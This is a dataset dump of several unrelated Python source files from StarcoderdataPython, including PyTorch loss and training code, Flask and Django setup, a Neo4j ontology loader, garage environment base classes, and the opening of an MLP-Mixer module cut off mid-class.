id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
1858467 | from .staggered_grid import StaggeredGrid, unstack_staggered_tensor
from .grid import CenteredGrid
from phi import math
from phi import geom
def staggered_grid(tensor, name='manta_staggered'):
    """Wrap a mantaflow staggered tensor as a phiflow StaggeredGrid.

    Mantaflow orders vector components as xyz while phiflow expects zyx,
    so the component (last) axis is reversed before construction.
    """
    zyx_tensor = tensor[..., ::-1]  # flip components: manta xyz -> phiflow zyx
    assert math.spatial_rank(zyx_tensor) == math.staticshape(zyx_tensor)[-1]
    return StaggeredGrid(zyx_tensor, name=name)
def centered_grid(tensor, name='manta_centered', crop_valid=False):
    """Wrap a mantaflow centered tensor as a phiflow CenteredGrid.

    When crop_valid is True, the last cell along every spatial axis is
    dropped; the batch (first) and channel (last) axes are kept intact.
    """
    if crop_valid:
        spatial_axes = math.spatial_rank(tensor)
        crop_index = (slice(None),) + spatial_axes * (slice(-1),) + (slice(None),)
        tensor = tensor[crop_index]
    return CenteredGrid(tensor, name=name)
| StarcoderdataPython |
138731 | <gh_stars>100-1000
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Created by: <NAME>
# Email: <EMAIL>
# Copyright (c) 2019
##+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
"""Calculate Multi-label Loss (Semantic Loss)"""
import torch
from torch.nn.modules.loss import _Loss
torch_ver = torch.__version__[:3]
__all__ = ['EdgeDetectionReweightedLosses', 'EdgeDetectionReweightedLosses_CPU']
class WeightedCrossEntropyWithLogits(_Loss):
    """Per-image reweighted binary cross-entropy on logits.

    Expects ``targets[i]`` to carry an extra leading channel: channel 0 is a
    padding mask (1 = valid pixel, 0 = padding) and channels 1: are the
    multi-label targets. Each image gets its own positive-class weight
    ``num_neg / num_pos`` (clamped to [1, num_total]) to counteract the heavy
    class imbalance typical of edge maps.
    """

    def __init__(self, weight=None, size_average=None, reduce=None, reduction='elementwise_mean'):
        # `weight` is accepted for API compatibility but is not used below;
        # the per-image pos_weight is computed in forward() instead.
        super(WeightedCrossEntropyWithLogits, self).__init__(size_average, reduce, reduction)

    def forward(self, inputs, targets):
        loss_total = 0
        for i in range(targets.size(0)):  # iterate for batch size
            pred = inputs[i]
            target = targets[i]
            pad_mask = target[0, :, :]   # channel 0: 1 = valid pixel, 0 = padding
            target = target[1:, :, :]    # remaining channels: the actual labels
            target_nopad = torch.mul(target, pad_mask)  # zero out the padding area
            num_pos = torch.sum(target_nopad)  # true positive number
            num_total = torch.sum(pad_mask)  # true total number
            num_neg = num_total - num_pos
            # NOTE(review): if an image has no positive pixels, num_pos == 0
            # and this division produces inf/nan *before* the clamp — confirm
            # every image is guaranteed at least one positive label.
            pos_weight = (num_neg / num_pos).clamp(min=1, max=num_total)  # compute a pos_weight for each image
            # Numerically stable expansion of weighted BCE-with-logits (same
            # form used by F.binary_cross_entropy_with_logits's pos_weight).
            max_val = (-pred).clamp(min=0)
            log_weight = 1 + (pos_weight - 1) * target
            loss = pred - pred * target + log_weight * (max_val + ((-max_val).exp() + (-pred - max_val).exp()).log())
            loss = loss * pad_mask  # padding pixels contribute zero loss
            # Mean over all elements (masked ones included, diluting the loss
            # by the padded fraction), then average over the batch below.
            loss = loss.mean()
            loss_total = loss_total + loss
        loss_total = loss_total / targets.size(0)
        return loss_total
class EdgeDetectionReweightedLosses(WeightedCrossEntropyWithLogits):
"""docstring for EdgeDetectionReweightedLosses"""
def __init__(self, weight=None, side5_weight=1, fuse_weight=1):
super(EdgeDetectionReweightedLosses, self).__init__(weight=weight)
self.side5_weight = side5_weight
self.fuse_weight = fuse_weight
def forward(self, *inputs):
side5, fuse, target = tuple(inputs)
loss_side5 = super(EdgeDetectionReweightedLosses, self).forward(side5, target)
loss_fuse = super(EdgeDetectionReweightedLosses, self).forward(fuse, target)
loss = loss_side5 * self.side5_weight + loss_fuse * self.fuse_weight
return loss
class EdgeDetectionReweightedLosses_CPU(WeightedCrossEntropyWithLogits):
    """CPU debugging variant: takes (pred, target) with pred = (side5, fuse)."""

    def __init__(self, weight=None, side5_weight=1, fuse_weight=1):
        super(EdgeDetectionReweightedLosses_CPU, self).__init__(weight=weight)
        self.side5_weight = side5_weight
        self.fuse_weight = fuse_weight

    def forward(self, *inputs):
        # Unlike the GPU variant, both predictions arrive packed in `pred`.
        pred, target = inputs
        parent_forward = super(EdgeDetectionReweightedLosses_CPU, self).forward
        side5_term = parent_forward(pred[0], target) * self.side5_weight
        fuse_term = parent_forward(pred[1], target) * self.fuse_weight
        return side5_term + fuse_term
| StarcoderdataPython |
3513599 | #{
#Driver Code Starts
#Initial Template for Python 3
# } Driver Code Ends
#User function Template for python3
def logical(a, b):
    """Print the results of `a and b`, `a or b` and `not a`, one per line."""
    for result in (a and b, a or b, not a):
        print(result)
#{
#Driver Code Starts.
def main():
    """Read a test-case count, then two ints per case, and run logical()."""
    testcases = int(input())
    for _ in range(testcases):  # same number/order of input() reads as before
        a = int(input())
        b = int(input())
        logical(a, b)


if __name__ == '__main__':
    main()
#} Driver Code Ends | StarcoderdataPython |
3510434 | import os
from flask import Flask
from flask_bcrypt import Bcrypt
from flask_sqlalchemy import SQLAlchemy
from application import constants
# Module-level Flask application state: one app backed by a local SQLite
# database via SQLAlchemy, with bcrypt available for password hashing.
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + constants.LOCAL_SQLITE_FILENAME
# Disable the modification-tracking event system (saves overhead, silences warning).
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
# Imported after `db` exists so the model module can bind to it
# (avoids a circular import at module load time).
from application.models import User # noqa
# In development only: create the schema on first run if the SQLite file
# does not exist yet.
if os.environ.get('FLASK_ENV') == 'development' and not os.path.isfile(constants.LOCAL_SQLITE_FILENAME):
    db.create_all()
| StarcoderdataPython |
4863112 | <reponame>zhanghao001122/study
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import json
import xlwt
#from ansible.plugins.callback import CallbackBase
#from ansible.parsing.dataloader import DataLoader
#from ansible.vars.manager import VariableManager
#from ansible.inventory.manager import InventoryManager
#from ansible.playbook.play import Play
#from ansible.executor.task_queue_manager import TaskQueueManager
#from collections import namedtuple
'''
#实例化解析yml
loader = DataLoader()
#实例化资产管理
inventory = InventoryManager(loader=loader,sources='hosts')
#实例化变量管理
variable_manager = VariableManager(loader=loader,inventory=inventory)
Options = namedtuple('Options',
['connection',
'remote_user',
'ask_sudo_pass',
'verbosity',
'ack_pass',
'module_path',
'forks',
'become',
'become_method',
'become_user',
'check',
'listhosts',
'listtasks',
'listtags',
'syntax',
'sudo_user',
'sudo',
'diff'])
options = Options(connection='smart',
remote_user=None,
ack_pass=None,
sudo_user=None,
forks=5,
sudo=None,
ask_sudo_pass=False,
verbosity=5,
module_path=None,
become=None,
become_method=None,
become_user=None,
check=False,
diff=False,
listhosts=None,
listtasks=None,
listtags=None,
syntax=None)
play_source = dict(
hosts = 'all',
gather_facts = 'yes',
tasks = [
dict(action=dict(module='facter', args='')),
# dict(action=dict(module='debug', args=dict(msg='{{shell_out.stdout}}')))
]
)
play = Play().load(play_source, variable_manager=variable_manager, loader=loader)
class ModelResultsCollector(CallbackBase):
def __init__(self, *args, **kwargs):
super(ModelResultsCollector, self).__init__(*args, **kwargs)
self.host_ok = {}
self.host_unreachable = {}
self.host_failed = {}
def v2_runner_on_unreachable(self, result):
self.host_unreachable[result._host.get_name()] = result
def v2_runner_on_ok(self, result):
self.host_ok[result._host.get_name()] = result
def v2_runner_on_failed(self, result):
self.host_failed[result._host.get_name()] = result
callback = ModelResultsCollector()
passwords = dict()
# 传入自定义的callback
tqm = TaskQueueManager(
inventory=inventory,
variable_manager=variable_manager,
loader=loader,
options=options,
passwords=passwords,
stdout_callback=callback,
)
result = tqm.run(play)
# 自定义格式化输出,执行结果数据在result对象的_result属性里
result_raw = {'success':{},'failed':{},'unreachable':{}}
for host,result in callback.host_ok.items():
result_raw['success'][host] = result._result
for host,result in callback.host_failed.items():
result_raw['failed'][host] = result._result
datas = json.dumps(result_raw,indent=4)
'''
# Load facter results previously dumped to json.txt
# (structure: {'success': {host: facts}, 'failed': ..., 'unreachable': ...}).
with open('json.txt') as json_data:
    datas = json.load(json_data)

# Columns to export, in order; each entry is a facter fact key.
title = ['hostname',
         'ipaddress_br_ex',
         'ipaddress_br_fw_admin',
         'ipaddress_br_mgmt',
         'ipaddress_br_storage',
         'blockdevices',
         'blockdevice_sda_size',
         'interfaces',
         'memorytotal',
         'physicalprocessorcount',
         'processor0',
         'virtual',
         'bios_vendor',
         'architecture',
         'productname']

book = xlwt.Workbook()  # output workbook
sheet = book.add_sheet(u'云平台节点信息', cell_overwrite_ok=True)  # one sheet for all nodes

# Header row (row 0).
for col, field in enumerate(title):
    sheet.write(0, col, field)

# One row per successfully-gathered host, starting at row 1.
# (Bug fix: the original wrote to row count+1 with count already
# incremented, which left row 1 permanently blank.)
for row, hostname in enumerate(datas['success'], start=1):
    facts = datas['success'][hostname]
    # Missing facts are exported as the literal string 'None'
    # (replaces the bare try/except around each lookup).
    values = [facts.get(key, 'None') for key in title]
    for col, value in enumerate(values):
        sheet.write(row, col, value)

book.save('demo.xls')  # write the workbook to disk
#if __name__ == '__main__':
# writeM()
| StarcoderdataPython |
6697505 | <filename>python/database/createDiseases.py<gh_stars>0
from collections import defaultdict
from nertoolkit.geneontology.GeneOntology import GeneOntology
from database.Neo4JInterface import neo4jInterface
from synonymes.Synonym import Synonym
from synonymes.SynonymUtils import handleCommonExcludeWords
from utils.idutils import dataDir, loadExludeWords, printToFile, speciesName2TaxID
# Parse the Human Disease Ontology (DOID) OBO file into an ontology graph.
diseaseObo = GeneOntology(dataDir + "miRExplore/doid.obo")

tax2cells = defaultdict(set)  # NOTE(review): never populated below — appears unused

id2node = {}  # DOID id -> {'id': ..., 'name': ...} payload for the graph node
id2derived_from = defaultdict(set)  # DOID id -> ids of its direct is_a parents
for cellID in diseaseObo.dTerms:
    oboNode = diseaseObo.dTerms[cellID]
    oboID = oboNode.id
    oboName = oboNode.name
    oboRels = oboNode.is_a
    id2node[oboID] = {'id': oboID, 'name': oboName}
    if oboRels != None:
        for rel in oboRels:
            term = rel.term
            id2derived_from[oboID].add(term.id)

# Rebuild the DISEASE subgraph in Neo4j from scratch: drop existing
# DISEASE_DERIVED_FROM relationships and DISEASE nodes, then recreate them.
db = neo4jInterface(simulate=False)
db.deleteRelationship('n', ['DISEASE'], None, 'm', ['DISEASE'], None, ['DISEASE_DERIVED_FROM', None])
db.deleteNode(['DISEASE'], None)
db.createUniquenessConstraint('DISEASE', 'id')
# One node per ontology term.
for id in id2node:
    node = id2node[id]
    db.createNodeIfNotExists(['DISEASE'], node)
# One DISEASE_DERIVED_FROM edge per is_a relation.
for id in id2derived_from:
    allDerivatives = id2derived_from[id]
    for deriv in allDerivatives:
        # Skip parents that are not themselves in the ontology (dangling refs).
        if not deriv in id2node:
            continue
        db.createRelationship('disease', ['DISEASE'], {'id': id}, 'other', ['DISEASE'], {'id': deriv}, ['DISEASE_DERIVED_FROM'], None)
db.close() | StarcoderdataPython |
1630823 | # When you create a new test file, make sure to add it here.
# Simply import the class from your file, and then add that class to the '__all__' array.
from game.test_suite.tests.test_example import TestExample
__all__ = [
'TestExample'
] | StarcoderdataPython |
4939138 | import torch
def train(net, data_loader, parameters, device):
    """Train ``net`` with SGD and return the final epoch's summed loss.

    Args:
        net: torch module to optimize (moved to ``device``, put in train mode).
        data_loader: iterable of batches shaped ``{"x": features, "y": labels}``.
        parameters: dict of hyperparameters; recognized keys are ``lr``,
            ``momentum``, ``weight_decay``, ``num_epochs`` and ``grad_norm``.
        device: torch device to run on.

    Returns:
        float: sum of per-batch losses over the last epoch (0.0 if
        ``num_epochs`` is 0 — the original raised NameError in that case).
    """
    net.to(device=device)
    net.train()
    optimizer = torch.optim.SGD(
        net.parameters(),
        lr=parameters.get("lr", 0.0001),
        momentum=parameters.get("momentum", 0.0),
        weight_decay=parameters.get("weight_decay", 0.0),
    )
    # Hoisted out of the batch loop: the criterion is stateless, so there is
    # no need to construct a new CrossEntropyLoss on every step.
    criterion = torch.nn.CrossEntropyLoss()
    num_epochs = parameters.get("num_epochs", 10)
    epoch_loss = 0.0  # defined up front so num_epochs == 0 returns 0.0
    for epoch in range(1, num_epochs + 1):
        epoch_loss = 0.0  # only the last epoch's total is returned
        for i_batch, sample_batched in enumerate(data_loader):
            features = sample_batched["x"].to(device=device)
            labels = sample_batched["y"].to(device=device)
            optimizer.zero_grad()
            outputs = net(features)
            loss = criterion(outputs, labels)
            print("Epoch: ", epoch, "\tstep: ", i_batch, "\tloss: ", loss.item())
            epoch_loss += loss.item()
            loss.backward()
            # Optional gradient clipping, enabled by a positive "grad_norm".
            if "grad_norm" in parameters and parameters["grad_norm"] > 0:
                torch.nn.utils.clip_grad_norm_(net.parameters(), parameters["grad_norm"])
            optimizer.step()
    return epoch_loss
def evaluate(net, data_loader, device):
    """Compute top-1 accuracy of ``net`` over ``data_loader`` (no gradients).

    Batches are dicts with "x" (features) and "y" (integer class labels);
    returns correct / total as a float.
    """
    net.eval()
    num_correct = 0
    num_seen = 0
    with torch.no_grad():
        for batch in data_loader:
            inputs = batch["x"].to(device=device)
            targets = batch["y"].to(device=device)
            predictions = net(inputs).argmax(dim=1)
            num_seen += targets.size(0)
            num_correct += (predictions == targets).sum().item()
    return num_correct / num_seen
| StarcoderdataPython |
111360 | from django.db import models
from django.contrib.auth.models import User
class TerminationRequest(models.Model):
    """
    When an employee leaves the organization
    remove access to the different services that were previously requested
    """
    # Staff member who filed the request; kept (as NULL) if that account is
    # later deleted, so the request record survives.
    requester = models.ForeignKey(
        User, related_name='requested_terminations', on_delete=models.SET_NULL,
        blank=True, null=True)
    # who is leaving?
    user = models.ForeignKey(User, related_name='terminations',
                             on_delete=models.SET_NULL, blank=True, null=True)
    # is it new? approved? completed? denied?
    # NOTE(review): free-form text — consider `choices=` to constrain values.
    request_status = models.CharField(max_length=50)
    # will the employee be coming back at a later date? i.e. seasonal?
    returning = models.BooleanField(default=False)
    # Expected return date, only meaningful when `returning` is True.
    return_date = models.DateField(blank=True, null=True)
    # Set once when the row is created.
    requested = models.DateTimeField(auto_now_add=True)
    # any associated logged actions could trigger an update to updated
    updated = models.DateTimeField(auto_now=True)
    # when the account was closed -- job's finished
    terminated = models.DateTimeField(blank=True, null=True)
| StarcoderdataPython |
6432642 | <reponame>mardukbp/robotframework-lsp<filename>robotframework-interactive/src/robotframework_interactive/ast_utils.py
import sys
from typing import Iterator, Tuple, Any, Union, Generic, TypeVar
import ast as ast_module
# Generic type variables: Y is the (covariant) node type carried by NodeInfo;
# T is declared alongside it but not used in this module section.
T = TypeVar("T")
Y = TypeVar("Y", covariant=True)


class NodeInfo(Generic[Y]):
    """Pairs an AST node with the (immutable copy of the) stack of its ancestors."""

    stack: tuple  # ancestor nodes of `node`, outermost first
    node: Y       # the AST node itself

    __slots__ = ["stack", "node"]

    def __init__(self, stack, node):
        self.stack = stack
        self.node = node
class _NodesProviderVisitor(ast_module.NodeVisitor):
    """AST visitor that invokes ``on_node(stack, node)`` for every visited node.

    ``stack`` is the (shared, mutable) list of ancestors of ``node``,
    outermost first, including ``node`` itself at the top.
    """

    def __init__(self, on_node=lambda stack, node: None):
        # Bug fix: the default callback used to take a single `node` argument,
        # but generic_visit always calls it with (stack, node) — so using the
        # class without an explicit callback raised a TypeError.
        ast_module.NodeVisitor.__init__(self)
        self._stack = []
        self.on_node = on_node

    def generic_visit(self, node):
        self._stack.append(node)
        self.on_node(self._stack, node)
        ast_module.NodeVisitor.generic_visit(self, node)
        self._stack.pop()
class _PrinterVisitor(ast_module.NodeVisitor):
    """Debug visitor: writes an indented dump of each node (and its tokens,
    when present) with 0-based line/column positions to ``stream``."""

    def __init__(self, stream):
        ast_module.NodeVisitor.__init__(self)
        self._level = 0  # current tree depth; drives the printed indentation
        self._stream = stream

    def _replace_spacing(self, txt):
        # Right-align the position info at column 80 by expanding the
        # *SPACING* placeholder with the required number of spaces.
        # (If txt is already longer than 80 chars, delta is negative and the
        # placeholder is replaced with an empty string.)
        curr_len = len(txt)
        delta = 80 - curr_len
        return txt.replace("*SPACING*", " " * delta)

    def generic_visit(self, node):
        # Note: prints line and col offsets 0-based (even if the ast is 1-based for
        # lines and 0-based for columns).
        self._level += 1
        try:
            indent = " " * self._level
            node_lineno = node.lineno
            if node_lineno != -1:
                # Make 0-based
                node_lineno -= 1
            node_end_lineno = node.end_lineno
            if node_end_lineno != -1:
                # Make 0-based
                node_end_lineno -= 1
            self._stream.write(
                self._replace_spacing(
                    "%s%s *SPACING* (%s, %s) -> (%s, %s)\n"
                    % (
                        indent,
                        node.__class__.__name__,
                        node_lineno,
                        node.col_offset,
                        node_end_lineno,
                        node.end_col_offset,
                    )
                )
            )
            # Robot Framework AST nodes carry their source tokens; nodes
            # without a `tokens` attribute simply print nothing here.
            tokens = getattr(node, "tokens", [])
            for token in tokens:
                token_lineno = token.lineno
                if token_lineno != -1:
                    # Make 0-based
                    token_lineno -= 1
                self._stream.write(
                    self._replace_spacing(
                        "%s- %s, '%s' *SPACING* (%s, %s->%s)\n"
                        % (
                            indent,
                            token.type,
                            token.value.replace("\n", "\\n").replace("\r", "\\r"),
                            token_lineno,
                            token.col_offset,
                            token.end_col_offset,
                        )
                    )
                )
            ast_module.NodeVisitor.generic_visit(self, node)
        finally:
            self._level -= 1
def print_ast(node, stream=None):
    """Dump `node` (positions and tokens) to `stream`; defaults to sys.stderr."""
    out = sys.stderr if stream is None else stream
    _PrinterVisitor(out).visit(node)
def _iter_nodes(node, stack=None, recursive=True):
    """Yield (stack, child) for every AST node reachable from `node`.

    :note: the yielded stack is one shared mutable list — callers that want
        to keep it must copy it (see the NodeInfo-based public helpers).

    NOTE(review): with recursive=False, AST-valued fields (as opposed to
    list fields) are not yielded at all; that asymmetry is preserved here
    as-is — confirm whether it is intentional.
    """
    stack = [] if stack is None else stack
    for _name, field_value in ast_module.iter_fields(node):
        if isinstance(field_value, list):
            for child in field_value:
                if not isinstance(child, ast_module.AST):
                    continue
                yield stack, child
                if recursive:
                    stack.append(child)
                    yield from _iter_nodes(child, stack, recursive=recursive)
                    stack.pop()
        elif isinstance(field_value, ast_module.AST) and recursive:
            yield stack, field_value
            stack.append(field_value)
            yield from _iter_nodes(field_value, stack, recursive=recursive)
            stack.pop()
def _iter_nodes_filtered(
    ast, accept_class: Union[Tuple[str, ...], str], recursive=True
) -> Iterator[Tuple[list, Any]]:
    """Yield (stack, node) pairs whose node class name is in `accept_class`."""
    if not isinstance(accept_class, (list, tuple, set)):
        accept_class = (accept_class,)
    yield from (
        (stack, node)
        for stack, node in _iter_nodes(ast, recursive=recursive)
        if node.__class__.__name__ in accept_class
    )
def iter_nodes(
    ast, accept_class: Union[Tuple[str, ...], str], recursive=True
) -> Iterator[NodeInfo]:
    """Yield a NodeInfo (with a snapshotted ancestor stack) for every node
    whose class name is in `accept_class`."""
    if not isinstance(accept_class, (list, tuple, set)):
        accept_class = (accept_class,)
    for stack, node in _iter_nodes(ast, recursive=recursive):
        if node.__class__.__name__ not in accept_class:
            continue
        yield NodeInfo(tuple(stack), node)
def iter_all_nodes(ast, recursive=True) -> Iterator[NodeInfo]:
    """Yield a NodeInfo (with a snapshotted ancestor stack) for every node."""
    yield from (
        NodeInfo(tuple(stack), node)
        for stack, node in _iter_nodes(ast, recursive=recursive)
    )
| StarcoderdataPython |
1681814 | """Base Garage Environment API."""
import abc
from dataclasses import dataclass
from typing import Dict
import akro
import numpy as np
# Can't use naive garage import, or Sphinx AutoAPI breaks.
from garage._dtypes import StepType
@dataclass(frozen=True)
class InOutSpec:
    """Describes the input and output spaces of a primitive or module."""

    # akro space the primitive/module accepts as input.
    input_space: akro.Space
    # akro space the primitive/module produces as output.
    output_space: akro.Space
@dataclass(frozen=True, init=False)
class EnvSpec(InOutSpec):
    """Describes the observations, actions, and time horizon of an MDP.

    Args:
        observation_space (akro.Space): The observation space of the env.
        action_space (akro.Space): The action space of the env.
        max_episode_length (int): The maximum number of steps allowed in an
            episode.

    """

    def __init__(self,
                 observation_space,
                 action_space,
                 max_episode_length=None):
        # The dataclass is frozen, so normal attribute assignment would
        # raise; object.__setattr__ bypasses that inside this custom __init__.
        object.__setattr__(self, 'max_episode_length', max_episode_length)
        # Map MDP terms onto InOutSpec: actions are the "input" of the env,
        # observations its "output".
        super().__init__(input_space=action_space,
                         output_space=observation_space)

    max_episode_length: int or None = None

    @property
    def action_space(self):
        """Get action space.

        Returns:
            akro.Space: Action space of the env.

        """
        return self.input_space

    @property
    def observation_space(self):
        """Get observation space of the env.

        Returns:
            akro.Space: Observation space.

        """
        return self.output_space

    @action_space.setter
    def action_space(self, action_space):
        """Set action space of the env.

        Args:
            action_space (akro.Space): Action space.

        """
        # NOTE(review): this writes `_input_space`, which the getter never
        # reads (it returns `input_space`), and plain attribute assignment on
        # a frozen-dataclass instance raises FrozenInstanceError — this
        # setter looks non-functional; confirm whether it is ever exercised.
        self._input_space = action_space

    @observation_space.setter
    def observation_space(self, observation_space):
        """Set observation space of the env.

        Args:
            observation_space (akro.Space): Observation space.

        """
        # NOTE(review): same concern as the action_space setter in this
        # class — `_output_space` is never read and assignment on a frozen
        # instance raises; verify intent.
        self._output_space = observation_space
@dataclass
class EnvStep:
    # pylint: disable=missing-return-doc, missing-return-type-doc, missing-param-doc, missing-type-doc # noqa: E501
    r"""A single environment transition.

    Attributes:
        env_spec (EnvSpec): Specification of the environment this step was
            sampled from.
        action (numpy.ndarray): Action of shape :math:`(A^*)` taken this
            step, conforming to `env_spec.action_space`; `None` when
            `step_type` is `StepType.FIRST` (start of a sequence).
        reward (float): Reward for taking `action` given the observation;
            `None` when `step_type` is `StepType.FIRST`.
        observation (numpy.ndarray): Observation of shape :math:`(O^*)`
            after applying `action`, conforming to
            `env_spec.observation_space`.
        env_info (dict): Environment state information for this step.
        step_type (StepType): One of StepType.FIRST, StepType.MID,
            StepType.TERMINAL or StepType.TIMEOUT.

    """

    env_spec: EnvSpec
    action: np.ndarray
    reward: float
    observation: np.ndarray
    env_info: Dict[str, np.ndarray or dict]
    step_type: StepType

    @property
    def first(self):
        """bool: True when this step begins a sequence."""
        return self.step_type is StepType.FIRST

    @property
    def mid(self):
        """bool: True when this step is in the middle of a sequence."""
        return self.step_type is StepType.MID

    @property
    def terminal(self):
        """bool: True when the environment terminated the episode."""
        return self.step_type is StepType.TERMINAL

    @property
    def timeout(self):
        """bool: True when the episode ended by hitting the time limit."""
        return self.step_type is StepType.TIMEOUT

    @property
    def last(self):
        """bool: True when this step ends a sequence (terminal or timeout)."""
        return self.terminal or self.timeout
class Environment(abc.ABC):
    """Abstract base class for garage environments.

    Subclasses implement the rollout API — `reset()`, `step()`, `render()`,
    `visualize()` and `close()` — and expose `action_space`,
    `observation_space`, `spec` and `render_modes` as properties.

    A minimal rollout loop:

    .. code-block:: python

        env = MyEnv()
        policy = MyPolicy()
        first_observation, episode_info = env.reset()
        env.visualize()  # visualization window opened
        first_action = policy.get_action(first_observation, episode_info)
        episode = [env.step(first_action)]
        while not episode[-1].last():
            action = policy.get_action(episode[-1].observation)
            episode.append(env.step(action))
        env.close()  # visualization window closed

    Environments must be pickle-able: garage snapshots experiments with the
    `cloudpickle` module, so override `__getstate__`/`__setstate__` when an
    attribute (e.g. a client-server connection) cannot be pickled. Gym's
    EzPickle (https://github.com/openai/gym/blob/master/gym/utils/ezpickle.py)
    shows a lightweight constructor-argument-based approach.

    """

    @property
    @abc.abstractmethod
    def action_space(self):
        """akro.Space: The action space specification."""

    @property
    @abc.abstractmethod
    def observation_space(self):
        """akro.Space: The observation space specification."""

    @property
    @abc.abstractmethod
    def spec(self):
        """EnvSpec: The environment specification."""

    @property
    @abc.abstractmethod
    def render_modes(self):
        """list: Strings naming the supported render modes (see render())."""

    @abc.abstractmethod
    def reset(self):
        """Reset the environment to the start of a new episode.

        Returns:
            numpy.ndarray: The first observation, conforming to
                `observation_space`.
            dict: Episode-level information (distinct from the per-step
                `env_info` of `step()`); may be needed to choose the first
                action, e.g. for goal-conditioned tasks or MTRL.

        """

    @abc.abstractmethod
    def step(self, action):
        """Apply `action` and return the resulting `EnvStep`.

        If the previous `EnvStep` ended a sequence (TERMINAL or TIMEOUT),
        this call starts a new sequence and `action` is ignored. When
        `spec.max_episode_length` is reached without the environment
        terminating the episode, the returned step must have
        `step_type == StepType.TIMEOUT`. Implementations should also refresh
        any active visualization.

        Args:
            action (object): A NumPy array, or a nested dict/list/tuple of
                arrays, conforming to `action_space`.

        Returns:
            EnvStep: The environment step resulting from the action.

        Raises:
            RuntimeError: if `step()` is called before `reset()` has ever
                been called on this environment.

        """

    @abc.abstractmethod
    def render(self, mode):
        """Render the environment in the given mode.

        Conventional modes:

        * rgb_array: return an `numpy.ndarray` with shape (x, y, 3) and type
          uint8, holding RGB pixel values — suitable for video.
        * ansi: return a str or `StringIO.StringIO` with a terminal-style
          text representation (may contain newlines and ANSI escapes).

        `render_modes` must list every mode the implementation supports.

        Args:
            mode (str): the mode to render with; must be present in
                `self.render_modes`.

        """

    @abc.abstractmethod
    def visualize(self):
        """Open a visualization display for the environment.

        Call **only once**, after `reset()`. The display should update
        whenever the environment changes (i.e. on `step()`). Resources and
        windows are released by `close()`; if `close()` is never called
        explicitly, the visualization is torn down when the environment is
        garbage collected.

        """

    @abc.abstractmethod
    def close(self):
        """Release all resources, including windows opened by `visualize()`.

        Environments close themselves automatically when garbage collected
        or when the program exits.

        """

    def _validate_render_mode(self, mode):
        # Shared guard for subclasses: reject modes missing from render_modes.
        if mode not in self.render_modes:
            raise ValueError('Supported render modes are {}, but '
                             'got render mode {} instead.'.format(
                                 self.render_modes, mode))

    def __del__(self):
        """Close the environment when it is garbage collected."""
        self.close()
class Wrapper(Environment):
    """Base class for wrappers that delegate to an inner `Environment`."""

    def __init__(self, env):
        """Wrap `env`.

        Args:
            env (Environment): The environment to wrap.

        """
        self._env = env

    def __getattr__(self, name):
        """Fall back to the wrapped environment for unknown attributes.

        Args:
            name (str): attribute name.

        Returns:
            object: the wrapped attribute.

        Raises:
            AttributeError: for private names, or when the wrapped
                environment does not have the attribute either.

        """
        if name.startswith('_'):
            raise AttributeError(
                "attempted to get missing private attribute '{}'".format(name))
        if not hasattr(self._env, name):
            raise AttributeError('Attribute {} is not found'.format(name))
        return getattr(self._env, name)

    @property
    def action_space(self):
        """akro.Space: The wrapped environment's action space."""
        return self._env.action_space

    @property
    def observation_space(self):
        """akro.Space: The wrapped environment's observation space."""
        return self._env.observation_space

    @property
    def spec(self):
        """EnvSpec: The wrapped environment's specification."""
        return self._env.spec

    @property
    def render_modes(self):
        """list: Render modes supported by the wrapped environment."""
        return self._env.render_modes

    def step(self, action):
        """Delegate `step` to the wrapped environment.

        Args:
            action (np.ndarray): An action provided by the agent.

        Returns:
            EnvStep: The environment step resulting from the action.

        """
        return self._env.step(action)

    def reset(self):
        """Delegate `reset` to the wrapped environment.

        Returns:
            numpy.ndarray: The first observation, conforming to
                `observation_space`.
            dict: Episode-level information (see `Environment.reset`).

        """
        return self._env.reset()

    def render(self, mode):
        """Delegate `render` to the wrapped environment.

        Args:
            mode (str): a mode listed in `self.render_modes`.

        Returns:
            object: render output, environment-specific.

        """
        return self._env.render(mode)

    def visualize(self):
        """Delegate `visualize` to the wrapped environment."""
        self._env.visualize()

    def close(self):
        """Delegate `close` to the wrapped environment."""
        self._env.close()

    @property
    def unwrapped(self):
        """garage.Environment: The innermost (fully unwrapped) environment."""
        return getattr(self._env, 'unwrapped', self._env)
| StarcoderdataPython |
3453254 | <reponame>haribhutanadhu/PaddleViT
# Copyright (c) 2021 PPViT Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module implements MLP-Mixer
MLP-Mixer: An all-MLP Architecture for Vision
https://arxiv.org/abs/2105.01601
"""
import paddle
import paddle.nn as nn
from droppath import DropPath
class Identity(nn.Layer):
    """ Identity layer

    The output of this layer is the input without any change.
    Use this layer to avoid if condition in some forward methods
    """

    def __init__(self):
        super(Identity, self).__init__()

    def forward(self, x):
        # No-op: return the input tensor unchanged.
        return x
class PatchEmbedding(nn.Layer):
    """Patch Embeddings

    Apply patch embeddings on input images. Embeddings is implemented using a Conv2D op.

    Attributes:
        image_size: int, input image size, default: 224
        patch_size: int, size of patch, default: 4
        in_channels: int, input image channels, default: 3
        embed_dim: int, embedding dimension, default: 96
    """

    def __init__(self, image_size=224, patch_size=4, in_channels=3, embed_dim=96, norm_layer=None):
        super(PatchEmbedding, self).__init__()
        image_size = (image_size, image_size)
        patch_size = (patch_size, patch_size)
        # Patches per spatial axis (image is assumed divisible by patch size).
        patches_resolution = [image_size[0]//patch_size[0], image_size[1]//patch_size[1]]
        self.image_size = image_size
        self.patch_size = patch_size
        self.patches_resolution = patches_resolution
        self.num_patches = patches_resolution[0] * patches_resolution[1]
        self.in_channels = in_channels
        self.embed_dim = embed_dim
        # Non-overlapping conv (kernel == stride == patch size) implements
        # the linear patch projection.
        self.patch_embed = nn.Conv2D(in_channels=in_channels,
                                     out_channels=embed_dim,
                                     kernel_size=patch_size,
                                     stride=patch_size)
